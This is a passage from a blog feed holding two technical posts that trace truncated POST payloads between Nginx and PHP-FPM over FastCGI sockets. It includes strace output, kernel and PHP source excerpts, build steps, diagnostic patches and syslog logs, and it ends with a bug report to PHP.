75920 19:43:26 writev(3, [{iov_base=&quot;\1\5\0\1\200\0\0\0&quot;, iov_len=8}], 1) = -1 EAGAIN (Resource temporarily unavailable)</code></pre><p></p><p></p><p>I believe that Nginx is using <code>writev()</code> to send the <code>fastcgi</code> headers, and using <code>sendfile()</code> to send chunks of the body, which comes from this function in the <a href="https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/os/unix/ngx_linux_sendfile_chain.c?ref=scotthelme.co.uk#L50" rel="noreferrer">code</a>. It certainly seems like this is starting to make a little sense. Looking at the PHP config, I wanted to see what the backlog value was because it&apos;s not something I ever recall setting. I found the following in our config:</p><p></p><pre><code class="language-config">; Set listen(2) backlog.
; Default Value: 511 (-1 on Linux, FreeBSD and OpenBSD)
;listen.backlog = 511</code></pre><p></p><p></p><p>With a default value of <code>-1</code>, I was guessing that <code>backlog</code> might be cast to an unsigned int by the kernel, which it is (<a href="https://github.com/torvalds/linux/blob/8bb7eca972ad531c9b149c0a51ab43a417385813/net/socket.c?ref=scotthelme.co.uk#L1722-L1723" rel="noreferrer">source</a>).</p><p></p><pre><code class="language-c">if ((unsigned int)backlog &gt; somaxconn)
	backlog = somaxconn;</code></pre><p></p><p></p><p>You can also see that, as stated in the manual (<a href="https://man7.org/linux/man-pages/man2/listen.2.html?ref=scotthelme.co.uk#:~:text=If%20the%20backlog%20argument%20is%20greater%20than%20the%20value%20in%0A%20%20%20%20%20%20%20/proc/sys/net/core/somaxconn%2C%20then%20it%20is%20silently%20capped%20to%20that%0A%20%20%20%20%20%20%20value" rel="noreferrer">source</a>), if the defined <code>backlog</code> value is greater than <code>somaxconn</code>, it will be silently truncated to that value. Because <code>-1</code> will actually be <code>4294967295</code>, by default, PHP will always set backlog to the value of <code>somaxconn</code>, effectively letting the system decide.</p><p></p><pre><code class="language-bash"># cat /proc/sys/net/core/somaxconn
4096</code></pre><p></p><p></p><p>This means we can have up to <em>4,096 connections</em> pending in the backlog queue, which is quite a few!</p><p></p><h4 id="the-theory">The Theory</h4><p>At this point, I believe something like the following is happening during the lifecycle of the request.</p><p></p><ol><li>Nginx makes the <code>connect()</code> syscall and begins writing to the socket.</li><li>While PHP is able, it processes the initial requests. We see a small number of requests succeeding.</li><li>PHP becomes overloaded and stops processing new, inbound requests.</li><li>Nginx continues to make new connections and fill the socket buffer with data.</li><li>Once the receive buffer is full, Nginx will receive <code>EAGAIN</code> and likely wait for something like <code>fastcgi_send_timeout</code> (<a href="https://nginx.org/en/docs/http/ngx_http_fastcgi_module.html?ref=scotthelme.co.uk#fastcgi_send_timeout" rel="noreferrer">source</a>).</li><li>The send will timeout and Nginx will close the connection. </li><li>PHP becomes available and accepts the connection, starting to read until the receive buffer has been consumed. </li><li>Once the buffer has been read, PHP will get <code>EPIPE</code> and process the content read from the buffer.</li></ol><p></p><p>Sounds logical, right? It should also be easy enough to test this now that I know what I&apos;m aiming for so I tinkered with some of the config parameters in Nginx and it did indeed seem <code>fastcgi_send_timeout</code> was the main factor. By reducing the send timeout, I would see more requests failing to parse in general, and I assume that&apos;s because Nginx is timing out sooner so PHP has less time to get to the <code>backlog</code>.</p><p></p><h4 id="testing-the-theory">Testing The Theory!</h4><p>Now for the fun part, where you actually find out if you were right, or you were completely off the mark! I was looking into ways that I could reliably reproduce this and my first effort was to take a few steps. I reduced the number of child processes PHP can spawn to one, so it would be easy to keep it busy, and I reduced the send timeout on Nginx to three seconds so it would time out very quickly. With this basic setup I could send two requests sequentially and the first one would succeed and the second one would reliably fail, 100% of the time. I wanted something better than that though, something that would allow me to trigger this on a single request, and that&apos;s when <a href="https://twitter.com/poupas?ref=scotthelme.co.uk" rel="noreferrer">Jo&#xE3;o Poupino</a> dropped this <a href="https://gist.github.com/ScottHelme/87abff3292f3a1ea53ff373a2926e77b?ref=scotthelme.co.uk" rel="noreferrer">little gem</a> in Slack! </p><p></p><div class="gistcontainer" style="max-height: 300px; max-width: 80%; overflow: auto;">
  <script src="https://gist.github.com/ScottHelme/87abff3292f3a1ea53ff373a2926e77b.js"></script>
</div><p></p><p></p><p>This gives me the ability to talk directly to the PHP socket, using the FastCGI protocol, and completely cut Nginx out of the equation. The script also has a feature that allows you to send only a partial request, where it will randomly <code>close()</code> the socket somewhere during the transmission of the payload. With this, it should now be possible to reproduce this problem with only a single request. The moment of truth....</p><p></p><pre><code class="language-bash">python3 send-fastcgi-request.py unix:/run/php/php8.2-fpm.sock post.data --partial
[102935] Sending request 1/1
[102936] Connecting to unix:/run/php/php8.2-fpm.sock...
[102936] Sending 37 FastCGI records...
[102936]   * Sent record 1/37 (8 + 8 bytes)
[102936]   * Sent record 2/37 (8 + 512 bytes)
[102936]   * Sent record 3/37 (8 + 0 bytes)
[102936]   * Sent record 4/37 (8 + 32768 bytes)
[102936]   * Sent record 5/37 (8 + 32768 bytes)
[102936]   * Sent record 6/37 (8 + 32768 bytes)
[102936]   * Sent record 7/37 (8 + 32768 bytes)
[102936]   * Sent record 8/37 (8 + 32768 bytes)
[102936]   * Sent record 9/37 (8 + 32768 bytes)
[102936]   * Sent record 10/37 (8 + 32768 bytes)
[102936]   * Sent record 11/37 (8 + 32768 bytes)
[102936]   * Sent record 12/37 (8 + 32768 bytes)
[102936]   * Sent record 13/37 (8 + 32768 bytes)
[102936]   * Sent record 14/37 (8 + 32768 bytes)
[102936]   * Sent record 15/37 (8 + 32768 bytes)
[102936]   * Sent record 16/37 (8 + 32768 bytes)
[102936]   * Sent record 17/37 (8 + 32768 bytes)
[102936]   * Sent record 18/37 (8 + 32768 bytes)
[102936]   * Sent record 19/37 (8 + 32768 bytes)
[102936]   * Sent record 20/37 (8 + 32768 bytes)
[102936]   * Sent record 21/37 (8 + 32768 bytes)
[102936]   * Sent record 22/37 (8 + 32768 bytes)
[102936]   * Sent record 23/37 (8 + 32768 bytes)
[102936]   * Sent record 24/37 (8 + 32768 bytes)
[102936] Closing socket after record 24!</code></pre><p></p><p></p><p>The script started to send my large POST payload and decided to close the socket after sending only 24 out of the 37 chunks of the request. Time to check <code>syslog</code> and see if we can find what I&apos;m hoping for and expecting.</p><p></p><pre><code class="language-log">Oct 13 13:33:57 test-server php: POST data reading complete. Size: 688128 bytes (out of 1069923 bytes)
Oct 13 13:34:07 test-server php: JSON decode failed: 1069923 688128</code></pre><p></p><p></p><p>Finally! &#x1F37E;&#x1F942;</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/10/cheers.gif" class="kg-image" alt="Sockets - Under The Hood: Understanding Truncated Request Behaviour" loading="lazy" width="480" height="270"></figure><p></p><p></p><p>It feels awesome to get to the bottom of something that&apos;s been bugging you so much! I fixed the issue a whole two blog posts ago, and I could have moved on, but sometimes, I really just need to understand <em>why</em> something is happening, and honestly, it was quite a fun journey getting here. I owe a big thanks to Jo&#xE3;o and Ignat, who collectively must have saved me countless days of effort that I might not even have had time for.</p><p></p><p>I&apos;ve also skipped over a few of the debugging steps above because this was becoming another lengthy blog post, but I did, during and after debugging, spend a lot of time trawling through the Nginx source to understand fully what&apos;s happening and also just to confirm my understanding.</p><p></p><p>The Nginx behaviour of using <code>writev()</code> and <code>sendfile()</code> can be seen here: <a href="https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/os/unix/ngx_linux_sendfile_chain.c?ref=scotthelme.co.uk#L50">https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/os/unix/ngx_linux_sendfile_chain.c#L50</a></p><p>Nginx adds a timeout when receiving <code>EAGAIN</code> here, using <code>fastcgi_send_timeout</code>. I also noticed in the Nginx source that it makes use of <code>epoll()</code>, which explains earlier why I was only seeing a single <code>EAGAIN</code> per request: <a href="https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/http/ngx_http_upstream.c?ref=scotthelme.co.uk#L2093">https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/http/ngx_http_upstream.c#L2093</a></p><p>The event timer expires in Nginx here: <a href="https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/event/ngx_event_timer.c?ref=scotthelme.co.uk#L54">https://github.com/nginx/nginx/blob/9f8d60081cd4eefa5fcf0df275d784d621290b9b/src/event/ngx_event_timer.c#L54</a></p><p>I also spotted that PHP was respawning the child processes when I was testing and that they&apos;d always have new PIDs after a test run. It seems that if the child is idle for too long, PHP will kill and respawn it, possibly based on this timeout value: <a href="https://github.com/php/php-src/blob/47c6b3bd452d2932af5c2f021b10ab2aaed01fb1/sapi/fpm/fpm/fpm_conf.c?ref=scotthelme.co.uk#L622">https://github.com/php/php-src/blob/47c6b3bd452d2932af5c2f021b10ab2aaed01fb1/sapi/fpm/fpm/fpm_conf.c#L622</a></p><p></p><p>All in all, I can now say I&apos;m happy that I understand everything that was happening with this issue and can finally put it to bed!</p><p>As a final closing note, just to nicely close things off, I got a response on the <a href="https://github.com/php/php-src/issues/12343?ref=scotthelme.co.uk#issuecomment-1761494201" rel="noreferrer">PHP bug</a> that I filed in the previous blog post and it seems that this finding is indeed a bug and will be patched!</p><p></p>]]></content:encoded></item><item><title><![CDATA[Processing Truncated Requests? A PHP Debugging Deep Dive]]></title><description><![CDATA[<p>In my previous blog post, I came across a bug in <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a> that took some effort to debug and fully understand before I could fix it. Whilst I&apos;d identified what the issue was, and how it was happening, I never got to the bottom of <em>why</em> it</p>]]></description><link>https://scotthelme.co.uk/processing-truncated-requests-php-debugging-deep-dive/</link><guid isPermaLink="false">6516a33bef8f4c000157b05a</guid><category><![CDATA[Report URI]]></category><category><![CDATA[PHP]]></category><category><![CDATA[nginx]]></category><category><![CDATA[truncated-post-requests]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Mon, 02 Oct 2023 10:14:00 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/09/background.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/09/background.png" alt="Processing Truncated Requests? A PHP Debugging Deep Dive"><p>In my previous blog post, I came across a bug in <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a> that took some effort to debug and fully understand before I could fix it. Whilst I&apos;d identified what the issue was, and how it was happening, I never got to the bottom of <em>why</em> it was happening. In this post, I&apos;m going to delve into the PHP source to figure it out!</p><p></p><h4 id="truncated-post-requests">Truncated POST Requests</h4><p>If you haven&apos;t read my previous blog post, <a href="https://scotthelme.co.uk/unravelling-mystery-of-truncated-post-requests-report-uri/?ref=scotthelme.co.uk" rel="noreferrer">Unravelling The Mystery Of Truncated POST Requests On Report URI</a>, you should start there as it sets the scene for what I&apos;m investigating here. It&apos;s a bit lengthy, but it has all of the details that are required to understand the journey in this post. Just like in that previous post, I&apos;m investigating things outside of my area of knowledge, but sometimes, I have an itch that I just have to scratch, and this was one of those times!</p><p></p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/09/report-uri-full-1.svg" class="kg-image" alt="Processing Truncated Requests? A PHP Debugging Deep Dive" loading="lazy" width="300" height="58"></a></figure><p></p><h4 id="it-wasnt-nginx">It Wasn&apos;t Nginx</h4><p>At the end of the last blog post, I wasn&apos;t 100% sure whether Nginx was at fault, or whether PHP was at fault. Admittedly, I did have a feeling that it was going to be PHP that was responsible, but I hadn&apos;t tested my idea and didn&apos;t have any evidence, so I didn&apos;t share that view at the time. </p><p>The problem we had was that POST requests were coming through and by the time they got to PHP the payload was truncated, and that caused a failure in parsing the JSON payload because it was invalid. I knew that Nginx was receiving the full payload and we use the default value for <code>fastcgi_request_buffering</code> (<a href="https://nginx.org/en/docs/http/ngx_http_fastcgi_module.html?ref=scotthelme.co.uk#fastcgi_request_buffering" rel="noreferrer">link</a>) so &quot;the entire request body is read from the client before sending the request to a FastCGI server&quot;. I could verify this with some simple debug logging in Nginx, which I did, and the failure was happening between Nginx and PHP during the <code>fastcgi_pass</code>. Nginx has the full request body to pass, it&apos;s just not making it to the other side because the socket is closed before everything can be sent. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-17.png" class="kg-image" alt="Processing Truncated Requests? A PHP Debugging Deep Dive" loading="lazy" width="481" height="162"></figure><p></p><p>Previously, we were using a TCP socket between Nginx and we were experiencing a lot of memory pressure on TCP resources. That resulted in an <code>out of memory - consider tuning tcp_mem</code> error (<a href="https://elixir.bootlin.com/linux/v5.15.131/source/net/ipv4/tcp.c?ref=scotthelme.co.uk#L2735">source</a>) and Linux does warn us that it will &quot;kill&quot; sockets if there is &quot;strong memory pressure&quot; (<a href="https://elixir.bootlin.com/linux/v5.15.131/source/net/ipv4/tcp_timer.c?ref=scotthelme.co.uk#L99">source</a>).</p><p></p><pre><code class="language-c">bool tcp_check_oom(struct sock *sk, int shift)
{
	bool too_many_orphans, out_of_socket_memory;

	too_many_orphans = tcp_too_many_orphans(shift);
	out_of_socket_memory = tcp_out_of_memory(sk);

	if (too_many_orphans)
		net_info_ratelimited(&quot;too many orphaned sockets\n&quot;);
	if (out_of_socket_memory)
		net_info_ratelimited(&quot;out of memory -- consider tuning tcp_mem\n&quot;);
	return too_many_orphans || out_of_socket_memory;
}</code></pre><p></p><pre><code class="language-c">/**
 *  tcp_out_of_resources() - Close socket if out of resources
 *  @sk:        pointer to current socket
 *  @do_reset:  send a last packet with reset flag
 *
 *  ...
 *
 *  Criteria is still not confirmed experimentally and may change.
 *  We kill the socket, if:
 *  1. If number of orphaned sockets exceeds an administratively configured
 *     limit.
 *  2. If we have strong memory pressure.
 *  3. If our net namespace is exiting.
 */
static int tcp_out_of_resources(struct sock *sk, bool do_reset)
{</code></pre><p></p><p></p><p>Since we swapped away from a TCP socket to a Unix socket, the same problem could still be reproduced, but instead by pressuring PHP.</p><p></p><h4 id="reproducing-the-error-with-a-unix-socket">Reproducing the error with a Unix Socket</h4><p>Using the same slow script from the previous blog, with a small tweak to remove the outbound TCP connection, we can keep all of the PHP processes busy easily.</p><p></p><pre><code class="language-php">sleep(30);

$json = json_decode(file_get_contents(&apos;php://input&apos;));

if ($json == null) {
  syslog(LOG_WARNING, &quot;JSON decode failed: &quot; . $_SERVER[&apos;CONTENT_LENGTH&apos;] . &quot; &quot; . strlen(file_get_contents(&apos;php://input&apos;)));
}</code></pre><p></p><p></p><p>I then tweaked the Nginx config so that it would timeout on <code>fastcgi</code> operations quickly.</p><p></p><pre><code class="language-nginx">fastcgi_connect_timeout 3s;
fastcgi_send_timeout 3s;</code></pre><p></p><p></p><p>The new Nginx config, coupled with the really long running PHP scripts, means that it will be easy to get Nginx to start timing out on the <code>fastcgi_pass</code> and that&apos;s when the error occurs.</p><p></p><h4 id="debugging-php">Debugging PHP</h4><p>Fortunately, I had quite a specific area of the <a href="https://github.com/php/php-src?ref=scotthelme.co.uk" rel="noreferrer">php-src</a> I&apos;d need to look at to investigate so this would help me narrow down quite quickly. We&apos;re running <code>v8.2.10</code> in production on Report URI and I&apos;ve also verified my findings here against the latest 8.2 branch which is <code>v8.2.11</code> at the time of writing. I will do my work here against that branch.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-16.png" class="kg-image" alt="Processing Truncated Requests? A PHP Debugging Deep Dive" loading="lazy" width="320" height="173"></figure><p></p><p>Following the processing of a request, we go through:</p><p><a href="https://github.com/php/php-src/blob/494d9e1f3199c529e974ec966ce8efee6d1b3a0c/main/main.c?ref=scotthelme.co.uk#L1714" rel="noreferrer">php_request_startup()<br></a><a href="https://github.com/php/php-src/blob/494d9e1f3199c529e974ec966ce8efee6d1b3a0c/main/main.c?ref=scotthelme.co.uk#L1748" rel="noreferrer">sapi_activate()<br></a><a href="https://github.com/php/php-src/blob/14b827049aed9fbd33df84f3428b98f27a7b216e/main/SAPI.c?ref=scotthelme.co.uk#L469" rel="noreferrer">sapi_read_post_data()</a> <br><a href="https://github.com/php/php-src/blob/dcee59eb331e34dea021358bfc9fc178981e7dca/main/SAPI.c?ref=scotthelme.co.uk#L256" rel="noreferrer">SAPI_POST_READER_FUNC()<br></a><a href="https://github.com/php/php-src/blob/dcee59eb331e34dea021358bfc9fc178981e7dca/main/SAPI.c?ref=scotthelme.co.uk#L273" rel="noreferrer">sapi_read_post_block()</a> <br><a href="https://github.com/php/php-src/blob/dcee59eb331e34dea021358bfc9fc178981e7dca/main/SAPI.c?ref=scotthelme.co.uk#L242" rel="noreferrer">sapi_module.read_post()</a> <br><a href="https://github.com/php/php-src/blob/1c93cdcea430b77a28b4a552a350cd84484f7259/sapi/cgi/cgi_main.c?ref=scotthelme.co.uk#L503" rel="noreferrer">sapi_fcgi_read_post()</a> <br><a href="https://github.com/php/php-src/blob/1c93cdcea430b77a28b4a552a350cd84484f7259/main/fastcgi.c?ref=scotthelme.co.uk#L1213" rel="noreferrer">fcgi_read()</a> <br><a href="https://github.com/php/php-src/blob/1c93cdcea430b77a28b4a552a350cd84484f7259/main/fastcgi.c?ref=scotthelme.co.uk#L954" rel="noreferrer">safe_read()</a></p><p>In <code>safe_read()</code>, we make the final system call to <a href="https://man7.org/linux/man-pages/man2/read.2.html?ref=scotthelme.co.uk" rel="noreferrer">read()</a>, to read data from the socket. I&apos;ve snipped the WIN32 code for ease of reading because it isn&apos;t relevant here.</p><p></p><pre><code class="language-c">static inline ssize_t safe_read(fcgi_request *req, const void *buf, size_t count)
{
	int    ret;
	size_t n = 0;

	do {
#ifdef _WIN32
		/* snip */
#endif
		errno = 0;
#ifdef _WIN32
		/* snip */
#else
		ret = read(req-&gt;fd, ((char*)buf)+n, count-n);
#endif
		if (ret &gt; 0) {
			n += ret;
		} else if (ret == 0 &amp;&amp; errno == 0) {
			return n;
		} else if (ret &lt;= 0 &amp;&amp; errno != 0 &amp;&amp; errno != EINTR) {
			return ret;
		}
	} while (n != count);
	return n;
}</code></pre><p></p><p>Looking at the manual page for <code>read()</code>, I notice a couple of things that stand out in Description and later in Return Value: </p><blockquote>If the file offset is at or past the end of file, no bytes are read, and read() returns zero.</blockquote><blockquote>On success, the number of bytes read is returned (zero indicates end of file)</blockquote><p></p><p>The PHP source has handling for <code>ret</code> being zero, and also checks <code>errno</code> in the two <code>else if</code> statements, but I wasn&apos;t sure what was being returned by <code>read()</code>. I decided to add some of my own logging to see exactly what was going on by patching PHP. I spun up a test server with some hefty resources so I&apos;d be able to build PHP quickly and set it up as follows.</p><p></p><pre><code class="language-bash">add-apt-repository ppa:ondrej/php
add-apt-repository ppa:ondrej/nginx
apt update
apt install nginx php8.2 php8.2-cli php8.2-common php8.2-curl php8.2-fpm php8.2-gd php8.2-igbinary php8.2-intl php8.2-mbstring php8.2-soap php8.2-xml php8.2-zip php8.2-redis
apt upgrade -y
reboot

mkdir build
cd build
sudo sed -i &apos;s/^#\s*\(.*\)/\1/&apos; /etc/apt/sources.list.d/ondrej-ubuntu-php-jammy.list
sudo apt-get update -y
sudo apt-get install -y devscripts build-essential fakeroot
sudo apt-get build-dep -y php8.2-fpm
apt-get source -y php8.2-fpm
cd php8.2-8.2.10
dpkg-buildpackage -rfakeroot -uc</code></pre><p></p><p>Even running on a hefty VPS with 16x Intel vCPU, 32 GB RAM and a 200 GB NVMe drive, it still took a little over 30 minutes to build, but it was ready. I made the following patch for <code>main/fastcgi.c</code>:</p><p></p><pre><code class="language-c">--- fastcgi.c.orig      2023-09-29 10:06:52.180803585 +0000
+++ fastcgi.c   2023-09-29 10:06:15.932395211 +0000
@@ -982,8 +982,10 @@
                if (ret &gt; 0) {
                        n += ret;
                } else if (ret == 0 &amp;&amp; errno == 0) {
+                       php_syslog(LOG_NOTICE, &quot;errno 0: %s&quot;, strerror(errno));
                        return n;
                } else if (ret &lt;= 0 &amp;&amp; errno != 0 &amp;&amp; errno != EINTR) {
+                       php_syslog(LOG_NOTICE, &quot;errno non-0: %s&quot;, strerror(errno));
                        return ret;
                }
        } while (n != count);</code></pre><p></p><p>I used <a href="https://man7.org/linux/man-pages/man3/strerror.3.html?ref=scotthelme.co.uk" rel="noreferrer">strerror()</a> to get the string version of the error number for ease of reading and I also wanted to monitor the progress of reading chunks from the socket too. I made another patch for <code>main/SAPI.c</code>:</p><p></p><pre><code class="language-c">--- SAPI.c.orig 2023-09-29 12:32:46.020740222 +0000
+++ SAPI.c      2023-09-29 12:34:35.769896620 +0000
@@ -248,6 +248,9 @@
                SG(post_read) = 1;
        }

+       php_syslog(LOG_NOTICE, &quot;Read %zu bytes (&quot; ZEND_LONG_FMT &quot; bytes remaining)&quot;,
+                       read_bytes, SG(request_info).content_length - SG(read_post_bytes));
+
        return read_bytes;
 }

@@ -285,6 +288,7 @@
                        }

                        if (read_bytes &lt; SAPI_POST_BLOCK_SIZE) {
+                               php_syslog(LOG_NOTICE, &quot;POST data reading complete. Size: &quot; ZEND_LONG_FMT &quot; bytes (out of &quot; ZEND_LONG_FMT &quot; bytes)&quot;, SG(read_post_bytes), SG(request_info).content_length);
                                break;
                        }
                }</code></pre><p></p><p>Now it was just a case of running <code>make</code> to incorporate my changes and overwrite the existing binary with my changes.</p><p></p><pre><code class="language-bash">cd fpm-build
make
systemctl stop php8.2-fpm.service
cp ./sapi/fpm/php-fpm /usr/sbin/php-fpm8.2
systemctl start php8.2-fpm.service</code></pre><p></p><p>All I had to do then was cause the issue and check syslog for the errors. I&apos;ve tidied up a snippet here and removed unrelated entries.</p><p></p><pre><code class="language-log">Sep 28 21:13:30 test-server php: Read 16384 bytes (1043937 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (1027553 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (1011169 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (994785 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (978401 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (962017 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (945633 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (929249 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (912865 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (896481 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (880097 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (863713 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (847329 bytes remaining)
Sep 28 21:13:30 test-server php: Read 16384 bytes (830945 bytes remaining)
Sep 28 21:13:30 test-server php: errno 0: Success
Sep 28 21:13:30 test-server php: Read 0 bytes (830945 bytes remaining)
Sep 28 21:13:30 test-server php: POST data reading complete. Size: 229376 bytes (out of 1060321 bytes)
Sep 28 21:13:30 test-server php: JSON decode failed: 1060321 229376</code></pre><p></p><p>Gotcha! &#x1F60E;</p><p></p><h4 id="but-we-didnt-get-everything">But we didn&apos;t get everything?</h4><p>At least now I can finally understand what&apos;s happening. Because PHP thinks it is hitting EOF, before it should, it&apos;s beginning to process the request without having the entire payload. What surprises me is that PHP <em>knows</em> it hasn&apos;t got all of the request payload, but it continues anyway. This is the part where I can&apos;t decide what it should do, but, saying &quot;hey, 50% of this payload is missing, let&apos;s go!&quot;, is what caught me out here. </p><p>To try and determine why the truncation is happening at a particular size, I&apos;d spotted that <a href="https://github.com/php/php-src/blob/dcee59eb331e34dea021358bfc9fc178981e7dca/main/SAPI.c?ref=scotthelme.co.uk#L273" rel="noreferrer">sapi_read_post_block()</a> was using <code>SAPI_POST_BLOCK_SIZE</code> defined as <code>define SAPI_POST_BLOCK_SIZE 0x4000</code>, or, converting that to decimal, <code>16,384</code>... Going back to the previous blog post, the POST payload was consistently being truncated at <code>65,536</code> bytes, which is <code>16,384 * 4 = 65,536</code>, so a possible cause for the specific size of the truncation? I&apos;m not so sure, because, when using TCP sockets, tweaking the values for <code>/proc/sys/net/ipv4/tcp_rmem</code> will change the size of the truncation, and the truncated size is not always a multiple of <code>16,384</code>. Also, when we switched to the Unix socket from the TCP socket, the size of the truncated payload changed to <code>229,376</code>, which closely aligns with <code>/proc/sys/net/core/[rw]mem_default</code> defined <a href="https://elixir.bootlin.com/linux/v5.15.131/source/include/net/sock.h?ref=scotthelme.co.uk#L2816" rel="noreferrer">here</a>. I even patched PHP again to modify <code>SAPI_POST_BLOCK_SIZE</code> but that didn&apos;t have an impact on the size of truncated payload. At this point, it&apos;s still not clear, but I know PHP will read from the socket until all of the data is read, what changes is how much data is there.</p><p>Once the <code>read()</code> system call in <code>safe_read()</code> returns <code>0</code>, we&apos;re going all the way back up the call stack to <code>SAPI_POST_READER_FUNC()</code> before any checking of the payload size takes place. In this function, there are only three checks taking place, and only one relates to the size of the payload (<a href="https://github.com/php/php-src/blob/PHP-8.2.11/main/SAPI.c?ref=scotthelme.co.uk#L282-L285" rel="noreferrer">source</a>).</p><p></p><pre><code class="language-c">if ((SG(post_max_size) &gt; 0) &amp;&amp; (SG(read_post_bytes) &gt; SG(post_max_size))) {
    php_error_docref(NULL, E_WARNING, &quot;Actual POST length does not match Content-Length, and exceeds &quot; ZEND_LONG_FMT &quot; bytes&quot;, SG(post_max_size));
    break;
}</code></pre><p></p><p>This seems like a sensible sanity check that the size of the POST payload is not exceeding the <code>post_max_size</code> limitation, which defaults to <code>8M</code> if not set, but the error message threw me a little. The first part of the error message states <code>Actual POST length does not match Content-Length</code>, which is precisely the error I&apos;m hoping to catch, but I can&apos;t see how the conditions match the text of the message, so this seems like a mistake in the text. Based on the conditions, a more accurate error text would be <code>POST length exceeds post_max_size</code>, but I have to let them off as this code is <a href="https://github.com/php/php-src/commit/b7ecaacd07b6be07677ed694b5dbc51b609c4263?ref=scotthelme.co.uk#diff-4d6eac2373e7408b73942b18b0c01f88b3610a14254d760cd16496caf1fed429R194" rel="noreferrer">23 years old</a>! The size of the POST is also checked earlier in the same function (<a href="https://github.com/php/php-src/blob/PHP-8.2.11/main/SAPI.c?ref=scotthelme.co.uk#L256:L260" rel="noreferrer">source</a>), before the body is read, by checking the declared <code>content-length</code> against <code>post_max_size</code>, so the check is backed up later after reading the body, and, the error text here is accurate.</p><p></p><pre><code class="language-c">if ((SG(post_max_size) &gt; 0) &amp;&amp; (SG(request_info).content_length &gt; SG(post_max_size))) {
		php_error_docref(NULL, E_WARNING, &quot;POST Content-Length of &quot; ZEND_LONG_FMT &quot; bytes exceeds the limit of &quot; ZEND_LONG_FMT &quot; bytes&quot;,
					SG(request_info).content_length, SG(post_max_size));
		return;
	}</code></pre><p></p><p></p><p>After that, we can run back up through the rest of the call stack and find no additional checks to match the size of the POST that was read against the declared size of the payload. The request will be processed even though we didn&apos;t get all of the request.</p><p></p><h4 id="is-this-a-bug">Is this a bug?</h4><p>I&apos;ve certainly gone backwards and forwards on my answer to this question, but ultimately, I think this is a bug. It boils down to choosing between two options:</p><p></p><ol><li>Should PHP dump the partial request with an error? </li><li>Should PHP attempt to process a partial request?</li></ol><p></p><p>I have looked at this from a security angle, and, so far, I&apos;ve not found a way this can be obviously abused, but it depends if receiving partial request payloads would be dangerous for your application. Arguably, this is something you should be handling anyway.</p><p>To see behaviour closer to what I was expecting to see, although not quite, I created a patch for <code>SAPI.c</code> that will dump the whole request body if we get a partial request.</p><p></p><pre><code class="language-bash">--- SAPI.c.orig 2023-09-29 12:32:46.020740222 +0000
+++ SAPI.c      2023-09-29 20:28:36.530234632 +0000
@@ -288,6 +288,12 @@
                                break;
                        }
                }
+
+               if (SG(read_post_bytes) != SG(request_info).content_length) {
+                       php_stream_truncate_set_size(SG(request_info).request_body, 0);
+                       php_error_docref(NULL, E_WARNING, &quot;POST length of &quot; ZEND_LONG_FMT &quot; bytes does not match declared Content-Length &quot; ZEND_LONG_FMT &quot; bytes; all data discarded&quot;, SG(read_post_bytes), SG(request_info).content_length);
+               }
+
                php_stream_rewind(SG(request_info).request_body);
        }
 }</code></pre><p></p><p></p><p>It&apos;s not perfect, but it does give me some clear feedback as to what happened, and, I don&apos;t receive a partial payload to process now. You can see the problem is detected on the final line of this log slice.</p><p></p><pre><code class="language-log">Sep 29 20:23:31 test-server php: Accepted connection: 0ce264eae07198c3c59ae90d04127c39
Sep 29 20:23:31 test-server php: Read 16384 bytes (1024737 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (1008353 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (991969 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (975585 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (959201 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (942817 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (926433 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (910049 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (893665 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (877281 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (860897 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (844513 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (828129 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (811745 bytes remaining)
Sep 29 20:23:31 test-server php: errno 0: Success
Sep 29 20:23:31 test-server php: Read 0 bytes (811745 bytes remaining)
Sep 29 20:23:31 test-server php: POST data reading complete. Size: 229376 bytes (out of 1041121 bytes)
